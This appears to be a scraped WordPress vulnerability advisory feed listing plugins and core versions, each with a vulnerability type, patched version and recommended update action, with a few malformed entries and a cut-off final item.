Plugin: Shortcodes by Angie Makes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.1.28
Recommended Action: Update to version 2.1.28, or a newer patched version

Plugin: WP Clone Menu

Vulnerability: Missing Authorization to Menu Clone
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GNUCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Popup Maker and Popup Anything – Popup for opt-ins and Lead Generation Conversions

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: 5 Anker Connect

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: TK Google Fonts GDPR Compliant

Vulnerability: Missing Authorization to Font Deletion
Patched Version: 2.2.12
Recommended Action: Update to version 2.2.12, or a newer patched version

Plugin: Ajax Pagination and Infinite Scroll

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YITH WooCommerce Waitlist

Vulnerability: Cross-Site Request Forgery via ‘save_mail_status’
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘redirectionPageContent’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: tencentcloud-cos

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_move_object
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Product Code for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Missing Authorization via get
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Custom Header Images

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Broken Link Manager

Vulnerability: Cross-Site Scripting
Patched Version: 0.5.0
Recommended Action: Update to version 0.5.0, or a newer patched version

Plugin: lastfm-rotation

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Call Now Button – The #1 Click to Call Button for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Support Board

Vulnerability: Authenticated SQL Injection
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.3.24
Recommended Action: Update to version 4.3.24, or a newer patched version

Plugin: Predictive Search for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: sourceAFRICA

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Event Timeline – Vertical Timeline

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup by Supsystic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.10.5
Recommended Action: Update to version 1.10.5, or a newer patched version

Plugin: WP Register Profile With Shortcode

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Unite Gallery Lite

Vulnerability: Authenticated (Administrator+) Local File Inclusion via ‘view’ parameter
Patched Version: 1.7.60
Recommended Action: Update to version 1.7.60, or a newer patched version

Plugin: Wise Agent Lead Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: CYSTEME Finder, the admin files explorer

Vulnerability: Arbitrary File Upload/Read
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Featured Image Caption

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.8.11
Recommended Action: Update to version 0.8.11, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Tables & Table Charts <= 2.1.65
Patched Version: 2.1.66
Recommended Action: Update to version 2.1.66, or a newer patched version

Plugin: Events Manager Pro

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Freesoul Deactivate Plugins – Disable plugins on individual WordPress pages

Vulnerability: Information Disclosure
Patched Version: 1.9.4.1
Recommended Action: Update to version 1.9.4.1, or a newer patched version

Plugin: WP Construction Mode

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.92
Recommended Action: Update to version 1.92, or a newer patched version

Plugin: Google Forms

Vulnerability: Unauthenticated Server Side Request Forgery
Patched Version: 0.92
Recommended Action: Update to version 0.92, or a newer patched version

Plugin: WooCommerce

Vulnerability: Settings Bypass leading to Account Creation
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: WP VK-付费内容插件(付费阅读/资料/工具软件资源管理)

Vulnerability: Cross-Site Request Forgery via AJAX actions
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: WP-RecentComments

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Custom Menu Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Data Tables Generator by Supsystic

Vulnerability: Cross-Site Scripting
Patched Version: 1.10.20
Recommended Action: Update to version 1.10.20, or a newer patched version

Plugin: BigBlueButton

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: dsSearchAgent: WordPress Edition

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Rights Access Manager

Vulnerability: Missing Authorization
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Float to Top Button

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Amministrazione Aperta

Vulnerability: Admin+ Local File Inclusion
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Accordion Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Motors – Car Dealer, Classifieds & Listing

Vulnerability: Cross-Site Request Forgery via Multiple Functions
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Salon Booking System

Vulnerability: Authenticated (Editor+) Privilege Escalation
Patched Version: 8.7
Recommended Action: Update to version 8.7, or a newer patched version

Plugin: SpiderVPlayer

Vulnerability: Multiple Blind Authenticated SQL Injections
Patched Version: 1.5.18
Recommended Action: Update to version 1.5.18, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Missing Authorization via export_settings
Patched Version: 4.6.15
Recommended Action: Update to version 4.6.15, or a newer patched version

Plugin: Organization chart

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Elementor Website Builder Pro

Vulnerability: Missing Authorization
Patched Version: 3.13.1
Recommended Action: Update to version 3.13.1, or a newer patched version

Core: WordPress MU

Vulnerability: Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Promotion Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Yoast SEO

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Resize Image After Upload

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: True Ranker

Vulnerability: Directory Traversal/Arbitrary File Read
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Missing Authorization in ajaxCalculatePrice function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Recent Posts Slider

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Share Button

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Translate Multilingual sites – TranslatePress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: MainWP Buddy Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Missing Authorization
Patched Version: 5.2.3.1
Recommended Action: Update to version 5.2.3.1, or a newer patched version

Plugin: Post Snippets – Custom WordPress Code Snippets Customizer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘snippet_content’
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Custom Permalinks

Vulnerability: No subtitle
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Advanced Booking Calendar

Vulnerability: Reflected Cross-Site Scripting via calId Parameter
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Online Lesson Booking

Vulnerability: Cross-Site Scripting
Patched Version: 0.8.7
Recommended Action: Update to version 0.8.7, or a newer patched version

Plugin: trust-form

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.9.0
Recommended Action: Update to version 3.9.0, or a newer patched version

Plugin: WordPress Brute Force Protection – Stop Brute Force Attacks

Vulnerability: Authenticated (Administrator+) SQL Injection via orderby
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: WP BrowserUpdate

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: Simpel Reserveren 3

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 404 to Start

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Arbitrary File Read
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: CM Download Manager – Document and File Management

Vulnerability: Code Injection
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WP CleanFix

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.45
Recommended Action: Update to version 1.1.45, or a newer patched version

Plugin: Reusable Text Blocks

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Registration Forms

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Adminimize

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.22
Recommended Action: Update to version 1.7.22, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Compact WP Audio Player

Vulnerability: Setting Change via Cross-Site Request Forgery
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.64.1
Recommended Action: Update to version 3.64.1, or a newer patched version

Plugin: Name Directory

Vulnerability: Cross-Site Scripting
Patched Version: 1.25.3
Recommended Action: Update to version 1.25.3, or a newer patched version

Plugin: FormCraft

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: WooCommerce Checkout & Funnel Builder by CartFlows – Create High Converting Stores For WooCommerce

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.5.16
Recommended Action: Update to version 1.5.16, or a newer patched version

Plugin: Stylish Price List – Price Table Builder & QR Code Restaurant Menu

Vulnerability: Missing Authorization
Patched Version: 7.0.18
Recommended Action: Update to version 7.0.18, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.38
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.38, 4.2.35, 4.3.31, 4.4.30, 4.5.29, 4.6.26, 4.7.26, 4.8.22, 4.9.23, 5.0.19, 5.1.16, 5.2.18, 5.3.15, 5.4.13, 5.5.12, 5.6.11, 5.7.9, 5.8.7, 5.9.6, 6.0.4, 6.1.2, 6.2.1

Plugin: Social Ring (Facebook Like, Google +1, ReTweet, LinkedIn and Pin It)

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WPML

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.3.7
Recommended Action: Update to version 4.3.7, or a newer patched version

Plugin: Import CSV Files

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Video Player for YouTube

Vulnerability: Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Minimal Coming Soon – Coming Soon Page

Vulnerability: Missing Authorization to Export Settings/Theme Change
Patched Version: 2.17
Recommended Action: Update to version 2.17, or a newer patched version

Plugin: WP Simple Galleries

Vulnerability: Authenticated (Contributor+) PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Add Hierarchy (parent) to post

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.13
Recommended Action: Update to version 3.13, or a newer patched version

Plugin: EXMAGE – WordPress Image Links

Vulnerability: Admin+ Blind SSRF
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: URL Cloak & Encrypt

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: Google Maps Anywhere

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: 5.9.1
Patched Version: 5.9.2
Recommended Action: Update to version 5.9.2, or a newer patched version

Plugin: Accessibility

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Exxp

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.174.1
Recommended Action: Update to version 5.174.1, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.7.2
Recommended Action: Update to version 1.2.7.2, or a newer patched version

Plugin: Porto Theme – Functionality

Vulnerability: Functionality <= 2.11.1
Patched Version: 2.12.1
Recommended Action: Update to version 2.12.1, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.23.3
Recommended Action: Update to version 4.23.3, or a newer patched version

Plugin: Like Button Rating ♥ LikeBtn

Vulnerability: Server-Side Request Forgery
Patched Version: 2.6.32
Recommended Action: Update to version 2.6.32, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.22.3
Recommended Action: Update to version 5.22.3, or a newer patched version

Plugin: WordPress支付宝Alipay|财付通Tenpay|贝宝PayPal集成插件

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BSK Contact Form 7 Blacklist

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated SQL Injection
Patched Version: 1.3.38
Recommended Action: Update to version 1.3.38, or a newer patched version

Plugin: Ultimate Category Excluder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Total Upkeep – WordPress Backup Plugin plus Restore & Migrate by BoldGrid

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Information Disclosure
Patched Version: 1.14.14
Recommended Action: Update to version 1.14.14, or a newer patched version

Plugin: Skippy WP-DB Backup (Legacy Core Plugin)

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPComplete

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.7.6
Recommended Action: Update to version 2.7.6, or a newer patched version

Plugin: MWB Point of Sale (POS) for WooCommerce- Generate Barcodes, Process your Bills, Synchronize, Your Online-Offline Orders

Vulnerability: Missing Authorization
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Subscribe2 – Form, Email Subscribers & Newsletters

Vulnerability: Cross-Site Request Forgery
Patched Version: 10.38
Recommended Action: Update to version 10.38, or a newer patched version

Plugin: Premium Courses & eLearning with Paid Memberships Pro for LearnDash, LifterLMS, Sensei LMS & TutorLMS

Vulnerability: Courses for Membership Add On <= 1.2.3
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Unauthenticated Sensitive Information Exposure via Debug Log File
Patched Version: 2.33.4
Recommended Action: Update to version 2.33.4, or a newer patched version

Plugin: Ultimate TinyMCE

Vulnerability: Cross-Site Scripting
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Bulk NoIndex & NoFollow Toolkit

Vulnerability: Reflected Cross-Site Scripting via ‘s’
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Custom Field Suite

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.5.15
Recommended Action: Update to version 2.5.15, or a newer patched version

Plugin: WP Spell Check

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 9.13
Recommended Action: Update to version 9.13, or a newer patched version

Plugin: DSubscribers

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WP Events Calendar Plugin

Vulnerability: SQL Injection
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Image Hover Effects Css3

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form – Custom Builder, Payment Form, and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Points and Rewards for WooCommerce – Create Loyalty Programs, Reward Customer Purchases, Point Rewards, Referral Points, Reward for Points, User Badges, and Gamification

Vulnerability: Missing Authorization
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: cforms

Vulnerability: Cross-Site Scripting
Patched Version: 10.5
Recommended Action: Update to version 10.5, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Cross-Site Request Forgery to Plugin Activation
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: IgniteUp – Coming Soon and Maintenance Mode

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Easy Plugin for AdSense

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.10
Recommended Action: Update to version 6.10, or a newer patched version

Plugin: Testimonial Rotator

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Asgaros Forum

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.15.13
Recommended Action: Update to version 1.15.13, or a newer patched version

Plugin: Taskbuilder – WordPress Project & Task Management plugin

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: IDOR to Sensitive Information Disclosure
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Favicon by RealFaviconGenerator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.23
Recommended Action: Update to version 1.3.23, or a newer patched version

Plugin: bbPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.10
Recommended Action: Update to version 2.5.10, or a newer patched version

Plugin: Donations via PayPal

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Arbitrary File Upload
Patched Version: 3.0.16
Recommended Action: Update to version 3.0.16, or a newer patched version

Plugin: Find and Replace All

Vulnerability: Cross-Site Request Forgery to Arbitrary Content Replacement
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Bypass URL Validation
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Realia

Vulnerability: Arbitrary Post Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form, Survey, Quiz & Popup Form Builder – ARForms

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: ELEX WooCommerce Google Shopping (Google Product Feed)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Donations Made Easy – Smart Donations

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Access Control Bypass
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Feeds for YouTube (YouTube video, channel, and gallery plugin)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Blind SQL Injection via current_page_type
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: All 404 Redirect to Homepage

Vulnerability: Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Open Redirect
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.11.4
Recommended Action: Update to version 6.11.4, or a newer patched version

Plugin: Form Store to DB

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Featured Posts by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: WP OAuth Server ( Login with WordPress )

Vulnerability: Authentication Bypass
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: ICS Calendar

Vulnerability: Authenticated (Contributor+) Directory Traversal via _url_get_contents
Patched Version: 10.12.0.2
Recommended Action: Update to version 10.12.0.2, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Directory Traversal to Arbitrary File Access
Patched Version: 3.7.16
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.16, 3.8.16, 3.9.14, 4.0.13, 4.1.13, 4.2.10, 4.3.6, 4.4.5, 4.5.4, 4.6.1

Plugin: Realia

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.9.2
Recommended Action: Update to version 0.9.2, or a newer patched version

Plugin: WP Shopping Pages

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form DB

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.20
Recommended Action: Update to version 2.8.20, or a newer patched version

Plugin: Mass Email To users

Vulnerability: Unauthenticated Reflected Cross-Site Scripting via ‘entrant’
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: SEO Rank Reporter

